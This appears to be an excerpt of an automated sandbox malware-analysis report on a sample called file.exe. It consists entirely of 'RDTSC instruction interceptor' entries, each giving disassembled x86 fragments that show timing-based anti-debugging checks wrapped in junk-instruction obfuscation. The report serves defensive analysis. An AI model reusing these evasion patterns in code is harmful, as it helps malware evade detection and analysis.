                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EBA1 second address: 84EBAD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F1CE19AAEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EE31 second address: 84EE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jl 00007F7F1D21A766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 852E0E second address: 852E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F7F1CE19ABAh 0x0000000b jmp 00007F7F1CE19AB4h 0x00000010 popad 0x00000011 add dword ptr [esp], 1C21066Fh 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F7F1CE19AA8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D3751h] 0x00000038 lea ebx, dword ptr [ebp+12454C17h] 0x0000003e adc dx, C6B3h 0x00000043 jmp 00007F7F1CE19AB8h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e ja 00007F7F1CE19AA6h 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853000 second address: 853071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A772h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F1D21A777h 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2B20h], ecx 0x00000016 push 00000000h 0x00000018 jmp 00007F7F1D21A770h 0x0000001d call 00007F7F1D21A769h 0x00000022 jng 00007F7F1D21A770h 0x00000028 pushad 0x00000029 jl 00007F7F1D21A766h 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 push eax 0x00000033 push ecx 0x00000034 push ecx 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 pop ecx 0x00000038 pop ecx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d push ebx 0x0000003e pushad 0x0000003f push edx 0x00000040 pop edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853071 second address: 853124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edi 0x00000009 jg 00007F7F1CE19AACh 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F7F1CE19AABh 0x00000019 pop eax 0x0000001a mov dword ptr [ebp+122D3241h], eax 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F7F1CE19AA8h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c call 00007F7F1CE19AB4h 0x00000041 mov esi, 43BBC238h 0x00000046 pop edi 0x00000047 mov edx, 4F8471E5h 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push edi 0x00000051 call 00007F7F1CE19AA8h 0x00000056 pop edi 0x00000057 mov dword ptr [esp+04h], edi 0x0000005b add dword ptr [esp+04h], 00000015h 0x00000063 inc edi 0x00000064 push edi 0x00000065 ret 0x00000066 pop edi 0x00000067 ret 0x00000068 push 00000003h 0x0000006a mov ecx, dword ptr [ebp+122D1C25h] 0x00000070 push 952E854Dh 0x00000075 push eax 0x00000076 push edx 0x00000077 push edi 0x00000078 jmp 00007F7F1CE19AB7h 0x0000007d pop edi 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853124 second address: 853172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2AD17AB3h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F7F1D21A768h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov cx, bx 0x0000002d lea ebx, dword ptr [ebp+12454C2Bh] 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C15 second address: 872C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870EB1 second address: 870EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870FE9 second address: 87100A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7F1CE19AA6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F1CE19AB0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87100A second address: 87100E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8713EC second address: 871406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AB4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872730 second address: 87274F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1D21A778h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877335 second address: 877339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877339 second address: 877351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F7F1D21A768h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877351 second address: 877379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F1CE19AB5h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877379 second address: 87737E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877473 second address: 87748D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F1CE19AAEh 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87748D second address: 877491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877491 second address: 8774C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jnl 00007F7F1CE19AA8h 0x00000012 jp 00007F7F1CE19AA8h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push esi 0x0000001e jmp 00007F7F1CE19AABh 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8774C7 second address: 8774CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8774CD second address: 8774D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DEE5 second address: 87DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F1D21A766h 0x0000000a jmp 00007F7F1D21A774h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E1F6 second address: 87E218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F7F1CE19AAAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E218 second address: 87E22D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F1D21A76Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E22D second address: 87E238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E238 second address: 87E23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881ADD second address: 881AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F7F1CE19AA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882266 second address: 88227B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pop esi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88227B second address: 882281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882281 second address: 88229D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7F1D21A775h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88229D second address: 8822D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F7F1CE19AB4h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7F1CE19AB1h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88263E second address: 882649 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882649 second address: 882663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7F1CE19AB1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882663 second address: 882668 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882839 second address: 88283D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88283D second address: 882843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882843 second address: 882855 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7F1CE19AA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8828DF second address: 8828FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1D21A778h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882D93 second address: 882D9D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F1CE19AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882E0B second address: 882E15 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882E15 second address: 882E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882E28 second address: 882E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882E37 second address: 882E8B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1CE19AACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F7F1CE19AA8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor dword ptr [ebp+122D326Dh], edi 0x0000002b push eax 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007F7F1CE19AB2h 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 jo 00007F7F1CE19AA6h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F3F second address: 882F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F43 second address: 882F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F7F1CE19AACh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88335D second address: 883362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883362 second address: 88336C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7F1CE19AA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883883 second address: 88388D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884227 second address: 88422C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88422C second address: 884232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884106 second address: 88410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884232 second address: 8842BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F7F1D21A76Fh 0x0000000d nop 0x0000000e xor esi, 5CE2FCCDh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F7F1D21A768h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push eax 0x00000031 jnc 00007F7F1D21A76Ch 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F7F1D21A768h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D18B1h], eax 0x0000005a push eax 0x0000005b pushad 0x0000005c pushad 0x0000005d jmp 00007F7F1D21A76Bh 0x00000062 pushad 0x00000063 popad 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 push esi 0x00000068 pop esi 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885384 second address: 8853E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F7F1CE19AA6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F7F1CE19AA8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D3191h], eax 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 jmp 00007F7F1CE19AAEh 0x00000039 pop esi 0x0000003a xchg eax, ebx 0x0000003b jc 00007F7F1CE19AAEh 0x00000041 jbe 00007F7F1CE19AA8h 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a je 00007F7F1CE19ABEh 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8867A4 second address: 8867AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888D2 second address: 8888D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888D7 second address: 888946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1D21A76Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F7F1D21A775h 0x00000014 jmp 00007F7F1D21A76Fh 0x00000019 pop edx 0x0000001a nop 0x0000001b or dword ptr [ebp+122D31D0h], edx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F7F1D21A768h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 jmp 00007F7F1D21A76Ah 0x00000045 pop edi 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a js 00007F7F1D21A766h 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888946 second address: 88894B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 886F57 second address: 886F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A293 second address: 88A307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jc 00007F7F1CE19AA6h 0x00000012 sub edi, dword ptr [ebp+122D2132h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F7F1CE19AA8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push 00000000h 0x00000036 jmp 00007F7F1CE19AB7h 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007F7F1CE19AB5h 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C1A3 second address: 88C1A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888699 second address: 88869F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D950 second address: 88D954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88869F second address: 8886A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886A3 second address: 8886A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D954 second address: 88D965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E882 second address: 88E88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886A7 second address: 8886B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F7F1CE19AA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA3D second address: 88DA47 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886B9 second address: 8886BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA47 second address: 88DA4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FC79 second address: 88FC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886BD second address: 8886C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890CCE second address: 890D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAEh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007F7F1CE19AB1h 0x00000013 pushad 0x00000014 jmp 00007F7F1CE19AB3h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891AA2 second address: 891AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891AA6 second address: 891AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
